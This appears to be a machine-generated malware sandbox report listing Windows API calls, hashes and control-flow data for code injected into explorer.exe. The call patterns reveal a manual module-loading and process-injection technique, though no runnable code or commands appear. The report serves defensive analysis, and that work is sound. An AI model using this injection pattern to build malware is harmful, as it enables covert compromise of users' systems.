                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                      • String ID:
                                                      • API String ID: 2993730741-0
                                                      • Opcode ID: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                      • Instruction ID: d5e7a5d4c6fba1c9ca2a6b0442937c699363d6c36e7367382e75030dee9f6b60
                                                      • Opcode Fuzzy Hash: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                                      • Instruction Fuzzy Hash: 5E219C707042129F8714FF2898558BEB7DEBF84B10B10092EF8D2D3242DB74DE0A8B62

                                                      Control-flow Graph

                                                      control_flow_graph 409 81581-81592 411 81598-8159b 409->411 412 81624-81628 409->412 413 8159d-815a0 411->413 414 815a7-815b3 GlobalFix 411->414 413->414 415 815a2-815a5 413->415 416 81623 414->416 417 815b5-815b9 414->417 415->412 415->414 416->412 418 815e9 417->418 419 815bb-815be 417->419 420 815eb-815f2 call 8293e 418->420 421 815c0-815c3 419->421 422 815e4-815e7 419->422 424 815f4-815fd call 82724 420->424 421->424 425 815c5-815e2 lstrlenW call 82a09 lstrcatW 421->425 422->420 431 8161b-81622 GlobalUnWire 424->431 432 815ff-81608 lstrlenW 424->432 425->424 431->416 432->431 433 8160a-8160e 432->433 434 8160f call 816b9 433->434 435 81614-81616 call 829eb 434->435 435->431
                                                      APIs
                                                      • GlobalFix.KERNEL32(00000000), ref: 000815A9
                                                      • lstrlenW.KERNEL32(00000000), ref: 000815C6
                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 000815DC
                                                      • lstrlenW.KERNEL32(00000000), ref: 00081600
                                                      • GlobalUnWire.KERNEL32(00000000), ref: 0008161C
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Globallstrlen$Wirelstrcat
                                                      • String ID:
                                                      • API String ID: 2993198917-0
                                                      • Opcode ID: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                      • Instruction ID: 788b0c73e6fd266604e91dee9fcfd0ea141b5d47a36d9ac5700182ba7bd2db02
                                                      • Opcode Fuzzy Hash: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                                      • Instruction Fuzzy Hash: D5010432A005119B96A577B9ACA85FE72EEFFC6B117080125F8C7E3212EE388D034750

                                                      Control-flow Graph

                                                      control_flow_graph 437 81bbd-81bd2 438 81bd4 437->438 439 81c06-81c0e 437->439 440 81bd6-81c04 RtlMoveMemory 438->440 441 81c69-81c71 439->441 442 81c10-81c15 439->442 440->439 440->440 444 81cb1 441->444 445 81c73-81c85 441->445 443 81c64-81c67 442->443 443->441 447 81c17-81c2a LoadLibraryA 443->447 446 81cb3-81cb8 444->446 445->444 448 81c87-81ca4 LdrProcessRelocationBlock 445->448 450 81cbb-81cbd 447->450 451 81c30-81c35 447->451 448->444 449 81ca6-81caa 448->449 449->444 452 81cac-81caf 449->452 450->446 453 81c5c-81c5f 451->453 452->444 452->448 454 81c61 453->454 455 81c37-81c3b 453->455 454->443 456 81c3d-81c40 455->456 457 81c42-81c45 455->457 458 81c47-81c51 GetProcAddress 456->458 457->458 458->450 459 81c53-81c59 458->459 459->453
                                                      APIs
                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00081BF4
                                                      • LoadLibraryA.KERNEL32(?), ref: 00081C1C
                                                      • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081C49
                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081C9A
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                      • String ID:
                                                      • API String ID: 3827878703-0
                                                      • Opcode ID: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                      • Instruction ID: 882ca4903ef036f6b5f5890f1cff92f57d062729b07f76d901994030c3102d93
                                                      • Opcode Fuzzy Hash: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                      • Instruction Fuzzy Hash: 8731AF71744616AFCB68DF29D885BA6B7ECBF15314F14412CE8C6C7200E736E846CBA0
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(0008582C), ref: 00081839
                                                      • lstrlenW.KERNEL32 ref: 00081845
                                                      • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000818A9
                                                      • Sleep.KERNEL32(00007530), ref: 000818B4
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                      • String ID:
                                                      • API String ID: 2134730579-0
                                                      • Opcode ID: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                      • Instruction ID: 7c053be448574412fdc363f5d5491aaf5b64503bb00f6c028054f82ac53ad905
                                                      • Opcode Fuzzy Hash: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                      • Instruction Fuzzy Hash: 9201DB70510900EBE314B765EC1A5BE3EA9FF817017100028F0C19B262DE388D01DFA6
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000811DD), ref: 000826DB
                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 000826ED
                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 00082700
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082716
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                      • String ID:
                                                      • API String ID: 331459951-0
                                                      • Opcode ID: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                      • Instruction ID: 630fcc8948f4ad9a4a54ff0f26d7f5e2b88293ccb917313e272e05edaa6f4c2a
                                                      • Opcode Fuzzy Hash: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                      • Instruction Fuzzy Hash: D0F0BE72806218FFAB20DFA1AD888EEBBBCFF05751B10026AE94093140D7358F009BA1
                                                      APIs
                                                        • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 000817F3
                                                      • wsprintfW.USER32 ref: 0008181D
                                                      Strings
                                                      • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00081817
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.628322017.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                      • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                      • API String ID: 377395780-613334611
                                                      • Opcode ID: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                      • Instruction ID: 471151813494080dcc102fe0f31ea5f83efc4e699d331606ea4c247a43dc96ce
                                                      • Opcode Fuzzy Hash: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                      • Instruction Fuzzy Hash: B4F03072900128BADB14ABD99C458FFB2FCFF0CB02B00018AFA81E1181F67C5A50D3B5

                                                      Execution Graph

                                                      Execution Coverage:9.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:19
                                                      Total number of Limit Nodes:3
                                                      (Rendered execution graph for functions 6b2be, 6b358 and 6b4a8; node and edge labels are image residue and are not reproduced as text.)

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      (Rendered callgraph of the Function_000xxxxx nodes; edge labels are image residue and are not reproduced as text.)

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      (Rendered control-flow graph for the function starting at 6370c; basic-block ranges and edges are image residue and are not reproduced as text.)
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 0006378C
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                      • Instruction ID: 6f86dcd5657ea9ef3a129f1321056eeef28fe10e10ecd7700be2daa8a1f1615e
                                                      • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                      • Instruction Fuzzy Hash: 9611C8746069094FFB6CFBB8989D3B533D3FB14312F544029E815C72A2DE398A818740

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      (Rendered control-flow graph for the function starting at 6b4a8; basic-block ranges and edges are image residue and are not reproduced as text.)
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 0006B5A7
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006B651
                                                      • VirtualProtect.KERNELBASE ref: 0006B66F
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.000000000006A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006A000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_6a000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                      • Instruction ID: de7da5a6e30cfdee21bae1f1aab1ff707d31be70e42097908793e0bf60735bc1
                                                      • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                      • Instruction Fuzzy Hash: C1514772758D1D4BCB24AA7C9C843F8B7D3FB55325B58062AD49BC3285EB58C9C68381

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      (Rendered control-flow graph for the function starting at 634c4; basic-block ranges and edges are image residue and are not reproduced as text.)
                                                      APIs
                                                        • Part of subcall function 00061BF8: OpenFileMappingA.KERNEL32 ref: 00061C0F
                                                        • Part of subcall function 00061BF8: MapViewOfFile.KERNEL32 ref: 00061C2E
                                                      • SysFreeMap.PGOCR ref: 000636F7
                                                      • SleepEx.KERNEL32 ref: 00063701
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$FreeMappingOpenSleepView
                                                      • String ID:
                                                      • API String ID: 4205437007-0
                                                      • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                      • Instruction ID: e861ec5d46096bab29741ff2dd44a154c76200efb4f374e95dae1c26c01eb10d
                                                      • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                      • Instruction Fuzzy Hash: 68517730218A089FDB59FF68D8996EA73E3EB94310F444619F45BC72A2DF78DA0587C1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      (Rendered control-flow graph for the function starting at 61bf8; basic-block ranges and edges are image residue and are not reproduced as text.)
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.628321277.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                      • Instruction ID: 3bcaf25acfd1f49024d9787d5b89c15f37bef9fb8d047487d34edab0d4ccc7e8
                                                      • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                      • Instruction Fuzzy Hash: 0FF01234314F4D4FEB45EF7C9C9C135B7E1EBA8202744857A985AC6165EF34C8458711